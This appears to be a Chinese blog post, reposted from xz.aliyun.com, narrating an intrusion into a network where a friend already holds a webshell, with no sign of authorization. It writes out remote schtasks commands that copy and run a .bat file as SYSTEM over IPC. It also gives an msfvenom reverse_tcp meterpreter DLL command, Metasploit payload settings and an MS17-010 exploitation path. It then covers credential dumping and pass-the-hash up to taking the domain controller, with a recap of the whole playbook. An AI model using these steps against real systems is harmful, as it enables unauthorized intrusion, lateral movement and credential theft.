记一次域渗透2

àì夳堔傛蜴生んèń 2022-12-29 02:16 194阅读 0赞

朋友拿下了一个webshell，想打打内网，但是无奈进不去，特此帮兄弟看看，这里也记录一下吧。先看杀软，此机器没有杀软.  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70]  
然后在看有没有域，没有域.  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 1]

然后我们就去抓密码，可能存在一种情况，就是本地的administrator的密码，可能是域管的密码。但是在这台机器上，我们并没有抓到administrator的密码  
这个时候就有两种思路。  
1.机器能出网，直接上cs。抓到本地管理的密码，横向撞一波，然后上去，抓一波密码，如果有域账号，就用域账号去装域机器，抓域管的账号密码。抓到大体上渗透就借宿。如果没有抓到域机器的，再用工作组管理员的账号去装其他工作组，再去抓密码。直到抓到域机器账号为止。  
2.机器不能出网（但是也可以看看其他协议，比如tcp不行的话，我们可以看看dns，如果dns可以的话我们也能上线）。那么我们可以尝试用ipc去连接其他机器。然后通过计划任务的方法上线cs。我们可以先看看net use有没有机器建立了连接。如果有，那就更好，直接计划任务执行bat文件。如果没有，那我们只有一个一个net use去尝试。

然后我这台webshell就是无法出网，现在这个域只有这一台机器，根本上不了线。所以我们就先看看net use.看看是否建立了连接.  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 2]  
然后我们在一个一个去试探。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 3]  
果然这个时候我们就成功的拿下一个  
然后这个时候我们就用计划任务去上线，（我用的sc），直接把命令放上来.  
![在这里插入图片描述][20201219151248145.png]  
1.首先在本机创建一个bat文件，里面写入想要执行的命令。  
whoami >> c:\\aa\\1.txt  
ipconfig >> c:\\aa\\1.txt  
netstat -ano >> c:\\aa\\1.txt  
2.然后在将1.bat文件考本到远程ipc的机器  
copy 1.bat \\192.168.160.139\\C$\\windows\\temp  
3.执行计划任务  
schtasks /create /tn task1 /s 192.168.160.139 /tr C:\\aa\\1.bat /sc ONSTART /RU system /f  
schtasks /run /tn task1 /s 192.168.160.139 /i  
schtasks /f /delete /tn task1 /s 192.168.160.139

然后这个时候就等待，如果上不去那只能说这台机器也无法出网，那唯一的思路就是找找数据库的密码，去翻密码。因为此机器开了1521.也是web界面。所以只有找找oracle.

![在这里插入图片描述][20201219151309125.png]

然后很幸运，我们88的机器能出网，至此，cs上了第一台机器。

![在这里插入图片描述][202012191513222.png]

然后抓密码

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 4]

于是我们就拿下了管理员的hash。这个时候我们就可以批量pth一波

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 5]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 6]

结果全失败了。现在我们的情况是拥有一个webshell。以及1台内网的工作组pc机器（此机器为mssql。开了1433）。  
我们还是在88的机器net use一遍，没有什么新的收获.然后这个时候我们看看这个c段的机器。这个域应该很大的。

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 7]

此时我们就用ms17010扫一波，先用socks的代理走出来。这时我把目标锁定在111这台机器（当然，其他有洞的机器都打了，都没有打不进去），但是用msf的exp是打不动的。这时候考虑用原生py打一波。

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 8]

首先用msf生成一个32位的dll，msfvenom -p windows/meterpreter/reverse\_tcp LHOST= LPORT=12399 -f dll > axgg.dll  
然后我们现在kali设置一个监听代理，为的是让原生py进入

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 9]

这里我的payload有问题，不应该用set payload windows/x64/meterpreter/reverse\_tcp.后头打进去了，但是一直说我的sessions die当时没有注意看。所以应该用这个paylaod  
set payload windows/meterpreter/reverse\_tcp.

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 10]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 11]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 12]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 13]

好的，现在我们的meterptrter弹过来了。  
然后我们看出来是一台ftpserver.但是用shell却无法将cmd反弹过来。然后我们只好抓抓密码。抓完了hash。因为此机器为域机器，所以我们直接反弹到cs上。这里我反弹的方法为meterpreter upload cs生成的exe。如果有杀软，我们可以background，然后将msf的meterpreter反弹到cs。

![在这里插入图片描述][202012191515527.png]

这个时候横向pth域控，直接拿下

![在这里插入图片描述][202012191515599.png]

然后我们再看看我们的身份（域管，直接拿下）

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 14]

然后再看看有哪些组。

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 15]

这时，这个域已经打完了。做一下总结吧！  
112段起手，但是不能出网，net use存在已知的ipc连接，那么我们直接ipc连接，用sc或者计划任务上线了我们的88段，抓密码虽然抓到了administrator的hash。但是pth其他工作组没有撞上。为什么要装其他工作组，因为其他工作组的administrators这个管理组可能是其他域机器的域管理员，如果能装上那么就会很幸运，但是这里我们没有撞上。此时我们用msf的ms17\_010批量扫了一波，有10多台左右，但是打不进去，这个时候我们就需要用原生py打一波，成功打下了144，至此，我们进入域，现在需要的就是从meterpreter反弹shell到cs。反弹上来抓一波密码，成功抓到administrator。直接pth过去。然后拿下域控。此时这个域已经打完。但是还是比较幸运，机器没有杀软，如果有杀软，还是特别硬的话，我们只能回到112，他是oracle的数据库，我们可以拿下oracle，然后在横向到其他web，在打内网。

原文地址：https://xz.aliyun.com/t/8597

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70]: /images/20221120/6e685497fd284f7bbcb91743e3363a95.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 1]: /images/20221120/4c3822e4c6304aacb2077c19870b9854.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 2]: /images/20221120/3af4ea69834049f8a03940f8c7a0e8d2.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 3]: /images/20221120/91e4aca59eca4ebfa9d989e775b500da.png
[20201219151248145.png]: /images/20221120/416a269f9d1d4eecb72106e275736750.png
[20201219151309125.png]: /images/20221120/3d8837b4a0754aa1ac9cf335ea2839f2.png
[202012191513222.png]: /images/20221120/175ded66e2d945378faed1320449b03d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 4]: /images/20221120/c9241bf5f3ae4cacade2207bc1240a8f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 5]: /images/20221120/8b38b0ced5bc44f9a1c2906582de9204.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 6]: /images/20221120/3a163806ebd94acfad93ecbce2834a96.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 7]: https://img-blog.csdnimg.cn/20201219151410281.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 8]: https://img-blog.csdnimg.cn/20201219151421697.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 9]: https://img-blog.csdnimg.cn/2020121915144720.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 10]: https://img-blog.csdnimg.cn/20201219151503476.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 11]: https://img-blog.csdnimg.cn/20201219151519304.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 12]: https://img-blog.csdnimg.cn/20201219151527257.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 13]: https://img-blog.csdnimg.cn/20201219151536325.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA==,size_16,color_FFFFFF,t_70
[202012191515527.png]: https://img-blog.csdnimg.cn/202012191515527.png
[202012191515599.png]: https://img-blog.csdnimg.cn/202012191515599.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 14]: https://img-blog.csdnimg.cn/20201219151607779.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 15]: https://img-blog.csdnimg.cn/20201219151617744.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA==,size_16,color_FFFFFF,t_70